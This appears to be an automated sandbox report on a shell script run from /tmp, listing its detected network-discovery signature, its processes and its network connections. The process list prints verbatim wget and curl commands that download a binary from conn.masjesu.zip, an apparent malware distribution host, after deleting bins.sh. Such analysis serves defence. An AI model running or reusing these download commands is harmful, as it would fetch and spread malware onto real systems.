[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.129.91:443 tcp
GB 89.187.167.3:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A